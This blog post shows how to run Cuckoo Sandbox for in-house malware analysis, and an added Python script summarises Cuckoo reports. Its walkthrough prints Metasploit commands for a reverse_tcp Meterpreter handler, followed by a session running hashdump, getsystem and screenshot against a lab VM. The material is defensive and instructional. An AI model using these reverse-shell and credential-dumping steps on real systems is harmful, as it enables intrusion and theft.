May 18, 2018
Malware Analysis is for the (Cuckoo) Birds
Written by
Scott Nusbaum


What is Cuckoo Sandbox?
According to their website, Cuckoo Sandbox is “the leading open source automated malware analysis system”.
Figure: Basic workings of Cuckoo


The supported virtualization platforms are:
- ESX / ESXI
- KVM
- QEMU
- VirtualBox
- VMware
- vSphere
- XenServer
- Proxmox -- I modified this to make it work; see the "Making Cuckoo working on Proxmox" blog post.


Why Should I Use It?
One of the main reasons to run the sandbox inside your organization is that it provides quick and definitive feedback on questionable files and URLs. For instance, an employee receives a phishing email with an attached document. Submit the document to Cuckoo and it will open the document and record everything that happens on the system during that time. If the document attempts to create a new process, drop a file, edit the registry, or download more malware, all of those actions will be recorded. However, if it is just a normal document, there is no need to spend the time and money to investigate it internally or send it out for analysis. The VM image can also be controlled. Most organizations build PCs from a template. That template can be converted to a VM disk and used as the basis for the Cuckoo analysis, which gives accurate results of how a piece of malware would behave in YOUR environment. The host system does not need to be an enterprise server with massive amounts of RAM and disk space; if the system is capable of running a single VM, it can run Cuckoo. The more powerful the host, the faster the VM can be spun up and torn down, but that extra PC in the corner that nobody is using is perfect for running a malware sample now and again.

Malware Walk-Through Without Network Connectivity
To illustrate the usage of the Cuckoo sandbox, let us explore a simple piece of malware. We will generate an executable using Metasploit that creates a reverse shell.




Malware Walk-Through with Network Connectivity
WARNING:
There are multiple reasons NOT to test with live network connectivity. One of the biggest is that it gives the attackers information about where the sample is being run. For instance, if the malware is a targeted attack on a certain company, or even a division within the company, and the C&C connection is established from somewhere else, the attackers now know they have been caught. This normally means they will change their approach or their malware. Other indicators include User-Agents, malformed C&C packets, and sandbox hostnames.

Using the same steps as above, but this time with network connectivity enabled, we created a malware sample that will attempt to connect to 192.168.56.22, a Kali Linux VM with a Metasploit handler listening for the Meterpreter connection. The submitted EXE is the same as before, but this time we interact with the session through Meterpreter. The following commands were issued:
- ls
- sysinfo
- hashdump
- getsystem
- screenshot
- quit
root@kali:~# msfconsole -q
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.56.22
lhost => 192.168.56.22
msf exploit(multi/handler) > set lport 8080
lport => 8080
msf exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.56.22:8080
[*] Sending stage (179779 bytes) to 192.168.56.99
[*] Meterpreter session 2 opened (192.168.56.22:8080 -> 192.168.56.99:49159) at 2018-03-29 15:02:39 -0400
meterpreter > ls
Listing: C:\Users\mikesmith\AppData\Local\Temp
==============================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100777/rwxrwxrwx 73802 fil 2018-03-29 19:00:54 -0400 1.exe
100666/rw-rw-rw- 0 fil 2018-03-27 09:44:20 -0400 FXSAPIDebugLogFile.txt
100666/rw-rw-rw- 0 fil 2018-03-28 19:31:47 -0400 Kno2B1.tmp
100666/rw-rw-rw- 0 fil 2018-03-28 19:42:54 -0400 Kno2FD6.tmp
100666/rw-rw-rw- 0 fil 2018-03-28 19:48:36 -0400 Kno6A27.tmp
100666/rw-rw-rw- 0 fil 2018-03-28 19:48:05 -0400 KnoF0B4.tmp
40777/rwxrwxrwx 0 dir 2018-03-28 19:43:55 -0400 Low
100666/rw-rw-rw- 898 fil 2018-03-28 19:31:53 -0400 StructuredQuery.log
40777/rwxrwxrwx 0 dir 2018-03-29 19:00:26 -0400 WPDNSE
100666/rw-rw-rw- 49208 fil 2018-03-28 20:14:28 -0400 mikesmith.bmp
100666/rw-rw-rw- 1869 fil 2018-03-27 19:22:55 -0400 wmsetup.log
meterpreter > sysinfo
Computer : MS_PC
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
meterpreter > screenshot
Screenshot saved to: /root/emDBSQxC.jpeg
meterpreter > quit
[*] Shutting down Meterpreter...
[*] 192.168.56.99 - Meterpreter session 2 closed. Reason: User exit
msf exploit(multi/handler) >
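As an added example (not code from the original post or from the Cuckoo project), here is a small Python summarizer that pulls the behaviours the "Why Should I Use It?" section says Cuckoo records (spawned processes, dropped files, registry writes, network connections such as the call-back to 192.168.56.22:8080 seen in the Meterpreter session above) out of a parsed Cuckoo report, with a review flag that stays clear for a harmless document. The report field layout and both sample reports are assumptions constructed for this example, modelled on the Cuckoo 2.x report.json.

```python
# Added example, not from the original post or the Cuckoo project: reduce a
# parsed Cuckoo report.json to the behaviours the post says Cuckoo records.
# The report layout (behavior.processes, behavior.summary, dropped,
# network.tcp) is an assumption modelled on Cuckoo 2.x reports.
# Constructed report for the 1.exe run from the post: it connected back to
# the handler on 192.168.56.22:8080. Child process, dropped file and
# registry key are made-up values for illustration.
SAMPLE_REPORT = {
    "target": {"file": {"name": "1.exe"}},
    "behavior": {
        "processes": [
            {"pid": 1234, "ppid": 800, "process_name": "1.exe"},
            {"pid": 1300, "ppid": 1234, "process_name": "cmd.exe"},
        ],
        "summary": {"regkey_written": [r"HKEY_CURRENT_USER\Software\Example\Installed"]},
    },
    "dropped": [{"name": "stage.bin"}],
    "network": {"tcp": [{"src": "192.168.56.99", "sport": 49159,
                         "dst": "192.168.56.22", "dport": 8080}]},
}

# Constructed report for a harmless document: Word opens it and nothing else happens.
BENIGN_REPORT = {
    "target": {"file": {"name": "invoice.docx"}},
    "behavior": {"processes": [{"pid": 2000, "ppid": 800, "process_name": "WINWORD.EXE"}],
                 "summary": {}},
    "dropped": [],
    "network": {"tcp": []},
}


def summarize_report(report):
    """Return the findings an analyst asks about first, plus a review flag."""
    behavior = report.get("behavior", {})
    procs = behavior.get("processes", [])
    pids = {p.get("pid") for p in procs}
    # A process whose parent is also in the monitored tree was spawned by the
    # sample; the root process (parent outside the tree) is the sample itself.
    spawned = [p["process_name"] for p in procs if p.get("ppid") in pids]
    findings = {
        "sample": report.get("target", {}).get("file", {}).get("name"),
        "spawned_processes": spawned,
        "dropped_files": [d["name"] for d in report.get("dropped", [])],
        "registry_writes": list(behavior.get("summary", {}).get("regkey_written", [])),
        "connections": sorted({f"{c['dst']}:{c['dport']}"
                               for c in report.get("network", {}).get("tcp", [])}),
    }
    keys = ("spawned_processes", "dropped_files", "registry_writes", "connections")
    findings["needs_review"] = any(findings[k] for k in keys)  # harmless doc -> False
    return findings
```

Feed it the `json.load` of a real task's report.json; the two constructed reports show the flag set for the reverse shell and clear for the harmless document.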